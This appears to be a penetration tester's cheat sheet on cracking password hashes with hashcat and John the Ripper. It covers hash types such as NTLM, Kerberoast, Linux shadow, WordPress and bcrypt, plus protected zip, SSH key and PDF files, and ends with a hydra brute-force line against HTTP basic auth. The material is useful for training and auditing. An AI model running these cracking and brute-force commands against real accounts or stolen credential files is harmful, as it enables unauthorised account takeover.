Crackhash | hashing

Hashes list

https://crackstation.net/ https://www.tunnelsup.com/hash-analyzer/ https://www.samsclass.info/123/proj10/p12-hashcat.htm https://hashcat.net/wiki/doku.php?id=example_hashes

https://medium.com/geekculture/hashcat-cheat-sheet-511ce5dd7857 https://www.cyberpratibha.com/hashcat-tutorial-for-password-cracking/ https://github.com/frizb/Hashcat-Cheatsheet

https://meowmeowattack.wordpress.com/2022/10/03/pentest-notes-password-hash-cracking/

Use OneRuleToRuleThemAll

https://github.com/stealthsploit/Optimised-hashcat-Rule

Example of hashes

https://hashcat.net/wiki/doku.php?id=example_hashes

1) Find out what encryption is used

$1$ md5crypt, used in Cisco stuff and older Linux/Unix systems
$2$, $2a$, $2b$, $2x$, $2y$ Bcrypt (Popular for web applications)
$6$ sha512crypt (Default for most Linux/Unix systems)

In in /etc/shadow

victim:$1$Ca5qWtrt$puXRv/CVeVaI1DWx.oM/n.:18235:0:99999:7:::

if the hash starts by $1$, MD5 is used if the hash starts by $2$ or $2a$, Blowfish is used; if the hash starts by $5$, SHA-256 is used; if the hash starts by $6$, SHA-512 is used.

or use a site like

https://www.tunnelsup.com/hash-analyzer/
https://hashes.com/en/decrypt/hash

Hashcat found encryption code

hashcat -h | grep sha512crypt

Crack Windows Authentication Hashes

Crack NT Hash / NTLM

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt ~/Downloads/users.txt

hashcat -m 1000 ~/Downloads/users.txt /usr/share/wordlists/rockyou.txt #mimikatz
/opt/hashcat/hashcat --force -m 1000 -r /opt/hashcat/rules/OneRuleToRuleThemAll.rule alice_ntlm.txt /opt/rockyou/rockyou.txt --outfile alice_ntlm_cracked.txt

hashcat -m 13100 -a 0 hash.txt Pass.txt #from rubeus / kerberoas
hashcat -m 5600 ntlmV2.txt rockyou.txt --force

hashcat -m 1000 -a 0 -w 4 --force --opencl-device-types 1,2 -O hash "realuniq.lst" -r OneRuleToRuleThemAll.rule
/opt/hashcat/hashcat -m 5600 hash /opt/rockyou/rockyou.txt -o cracked.txt --force -r /opt/hashcat/rules/OneRuleToRuleThemAll.rule --opencl-device-types 1,2 -O -w 4 -a 0

Crack linux /etc/shadow Hashes

Unshadowing

$ cat localshadow 
root:$6$Ha.d5nGupBm29pYr$yugXSk24ZljLTAZZagtGwpSQhb3F2DOJtnHrvk7HI2ma4GsuioHp8sm3LJiRJpKfIf7lZQ29qgtH17Q/JDpYM/:18576::::::

$ cat localpasswd 
root:x:0:0::/root:/bin/bash

$ unshadow localpasswd localshadow > unshadow

$ cat unshadow 
root:$6$Ha.d5nGupBm29pYr$yugXSk24ZljLTAZZagtGwpSQhb3F2DOJtnHrvk7HI2ma4GsuioHp8sm3LJiRJpKfIf7lZQ29qgtH17Q/JDpYM/:0:0::/root:/bin/bash

Crack Linux hash

cat passwords.txt
$6$ZC4srkt5HufYpAAb$GVDM6arO/qQU.o0kLOZfMLAFGNHXULH5bLlidB455aZkKrMvdB1upyMZZzq

hashcat -m 1800 -a 0 -o cracked.txt --remove passwords.txt /usr/share/wordlists/rockyou.txt
tail -f cracked.txt


hashcat -m 500 -a 0 bob.hash /usr/share/wordlists/rockyou.txt --force (for $1)

#Brute force all passwords length 1-8 with possible characters A-Z a-z 0-9
hashcat -m 500 hashes.txt -a 3 ?1?1?1?1?1?1?1?1 --increment -1 ?l?d?u

john unshadow 
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt ~/Downloads/unshadow 

decrypt a key with openssl

openssl rsa -in hype_key -out hype_key_decrypted
Enter pass phrase for hype_key:
writing RSA key

Single Crack Mode

In this mode, John uses only the information provided in the username, to try and work out possible passwords heuristically, by slightly changing the letters and numbers contained within the username.

If we take the username: Markus

Some possible passwords could be:

Markus1, Markus2, Markus3 (etc.)
MArkus, MARkus, MARKus (etc.)

A Note on File Formats in Single Crack Mode

If you’re cracking hashes in single crack mode, you need to change the file format that you’re feeding john for it to understand what data to create a wordlist from.

From:

1efee03cdcb96d90ad48ccc7b8666033

mike:1efee03cdcb96d90ad48ccc7b8666033

$ cat hash7.txt 
joker:7bf6d9bb82bed1302f331fc6b816aada

john --single --format=raw-md5 ~/Downloads/hash7.txt

Crack md5

hash-identifier 48bb6e862e54f2a795ffc4e541caed4d

hashcat --help | grep md5 # Find the hash id

hashcat -m 0 48bb6e862e54f2a795ffc4e541caed4d /usr/share/wordlists/rockyou.txt --show

Using hash-buster

/opt/Hash-Buster/hash.py -s a6eb56f80be8a120436d6f1c9b8d87ca

Crack keepass

hashcat -m 13400 keepass.hash /opt/rockyou/rockyou.txt --force
john --wordlist=/opt/rockyou/rockyou.txt dbhash --format=KeePass-opencl

Crack md4

hash-identifier 279412f945939ba78ce0758d3fd83daa

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

hashcat -m 900 -r /usr/share/hashcat/rules/best64.rule 279412f945939ba78ce0758d3fd83daa /usr/share/wordlists/rockyou.txt --show
279412f945939ba78ce0758d3fd83daa:Eternity22

John Custom Rules

Custom rules are located in /etc/john/john.conf there is a massive level of granular control that you can define in these rules

Crack Zip Files

Convert the zip file into a hash format that John is able to understand

zip2john secure.zip > secure_hash
Created directory: /home/clobee/.john
ver 1.0 efh 5455 efh 7875 secure.zip/zippy/flag.txt PKZIP Encr: 2b chk, TS_chk, cmplen=38, decmplen=26, crc=849AB5A6

john --wordlist=/usr/share/wordlists/rockyou.txt secure_hash 
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

Crack RAR Archives

Convert the rar file into a hash format that John is able to understand

rar2john secure.rar > rar_hash

john --wordlist=/usr/share/wordlists/rockyou.txt rar_hash

unrar e secure.rar

Webdav

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash

hashcat --force -m 500 -a 0 -o found1.txt --remove hash /opt/rockyou/rockyou.txt

Confluence (Atlassian)

/opt/hashcat/hashcat --force -m 12001 hashes.txt /opt/wordlists/fasttrack.txt

Crack SSH Key Passwords

Using John to crack the SSH private key password of id_rsa files.

$ locate ssh2john               
/home/clobee/tmp/ccpentesting/john/run/ssh2john.py
/usr/local/bin/john-jumbo/run/ssh2john.py
/usr/share/john/ssh2john.py

/usr/share/john/ssh2john.py idrsa.id_rsa > idrsa.hash

john --wordlist=/usr/share/wordlists/rockyou.txt idrsa.hash

To crack with hashcat https://miloserdov.org/?p=5426#6

Crack encrypted gpg files

How to encrypt

$ cat secret.txt 
this is secret

$ gpg --cipher-algo AES-256 --symmetric secret.txt

$ cat secret.txt.gpg 
����*wj\k��M�MQ��fym�r��O�S�<}�W�0%     

How to decrypt

$ gpg secret.txt.gpg 
gpg: WARNING: no command supplied.  Trying to guess what you mean ...
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
File 'secret.txt' exists. Overwrite? (y/N) y

$ cat secret.txt
this is secret

Decrypt using gpg2john

$ gpg2john secret.txt.gpg > hash                                    

File secret.txt.gpg

john --wordlist=/usr/share/wordlists/rockyou.txt --format=gpg hash

Crack wordpress password

cat ~/Downloads/hash.txt 
$P$984478476IagS59wHZvyQMArzfx58u.

/opt/hashcat/hashcat -m 400 -a 0 '$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0' /opt/rockyou/rockyou.txt
hashcat -O -m 400 -a 0 -o ~/Downloads/cracked.txt ~/Downloads/hash.txt /usr/share/wordlists/rockyou.txt
tail -f ~/Downloads/cracked.txt

Crack Drupal password

/opt/hashcat/hashcat -m 7900 -a 0 '$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR' /opt/rockyou/rockyou.txt

Crack SHA-1

hash-identifier cbfdac6008f9cab4083784cbd1874f76618d2a97

Possible Hashes:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

hashcat --help | grep SHA-1 # Find the hash id

hashcat -m 100 cbfdac6008f9cab4083784cbd1874f76618d2a97 /usr/share/wordlists/rockyou.txt --show
cbfdac6008f9cab4083784cbd1874f76618d2a97:###########

Crack SHA2-256

hash-identifier 1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B336B63032

Possible Hashs:
[+] SHA-256
[+] Haval-256

hashcat --help | grep SHA2-256 # Find the hash id

hashcat -m 1400 1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032 /usr/share/wordlists/rockyou.txt --show
1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032:#######

Crack bcrypt

hashcat --help | grep bcrypt # Find the hash id

# Thanks to THM '****' we know the length of the answer 
hashcat -m 3200 -a 3 hash.txt '?l?l?l?l'
$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom:####

Hashcat attack mode

    ?l: lowercase letters (a-z)
    ?u: uppercase letters (A-Z)
    ?d: decimal digits (0-9)
    ?h: lowercase hexadecimal digits (0-9, a-f)
    ?H: uppercase hexadecimal digits (0-9, A-F)
    ?s: basic ASCII symbols (e.g., @)
    ?a: printable ASCII characters (numbers, letters, symbols)
    ?b: every possible byte value, from 0x00 to 0xff

Crack SHA-256

hash-identifier F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85

Possible Hashs:
[+] SHA-256
[+] Haval-256

hashcat --help | grep SHA2-256 # Find the hash id

hashcat -m 1400 f09edcb1fcefc6dfb23dc3505a882655ff77375ed8aa2d1c13f640fccc2d0c85 /usr/share/wordlists/rockyou.txt --show
f09edcb1fcefc6dfb23dc3505a882655ff77375ed8aa2d1c13f640fccc2d0c85:#####

Crack sha512crypt

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Crack hmac-sha1

hash-identifier e5d8870e5bdd26602cab8dbe07a942c8669e56d6

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

hashcat --help | grep 'sha1(' # Find the hash id

110 | sha1($pass.$salt)                                | Raw Hash, Salted and/or Iterated
120 | sha1($salt.$pass)                                | Raw Hash, Salted and/or Iterated
...

hashcat -m 110 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme -a 3 '?a?a?a?a?a?a?a?a?a?a?a?a' /usr/share/wordlists/rockyou.txt --show

This command took hours and didn’t yield any exploitable result. I then checked the hint on THM, which was: HMAC-SHA1

hashcat --help | grep -i 'hmac-sha1' # Find the hash id

150 | HMAC-SHA1 (key = $pass)                          | Raw Hash, Authenticated
160 | HMAC-SHA1 (key = $salt)                          | Raw Hash, Authenticated
...

# Umbraco cms
hashcat -m 100 admin.sha1 /usr/share/wordlists/rockyou.txt --force

hashcat -m 160 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme /usr/share/wordlists/rockyou.txt --show
e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme:##########

Active Directory

Crack Group policy password

Can use Get-GPPPasword.ps1 (from Powersploit)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt -O
hashcat -m 13100 -a 0 -w 4 --force --opencl-device-types 1,2 -O hash realhuman_phill.txt -r OneRuleToRuleThemAll.rule 

# Cracking asreproast hash
hashcat -m 18200 hash -a 0 /usr/share/wordlists/rockyou.txt

hashcat -m 18200 dave.hash /opt/rockyou/rockyou.txt -r /opt/hashcat/rules/best64.rule --force

# Cracking kerberoast hash
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

For the mimikatz extracted hashes we need to issue tgsrepcrack.py

python tgsrepcrack.py c:\rockyou.txt c:\ticket.kirbi

Cracking PDF Hashes

Crack with hashcat (slow)

/usr/bin/pdf2john Infrastructure.pdf

# Let's save the hash, only second part (from `$pdf$4...` up till the end)
hashcat -a 3 -m 10500  pdf.hash

Crack with PDFcrack

pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt

Apache

Cracking .htpasswd passwords (basic auth)

# Format: $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
john --show hash
john --wordlist=/opt/rockyou/rockyou.txt htpasswd.txt

hashcat -m 1600 hash rockyou.txt --force

Brute force basic auth (htaccess) ```bash hydra -l offsec -P /usr/share/wordlists/rockyou.txt -f 192.168.24.52 http-get

Crack hashes [ hashing ]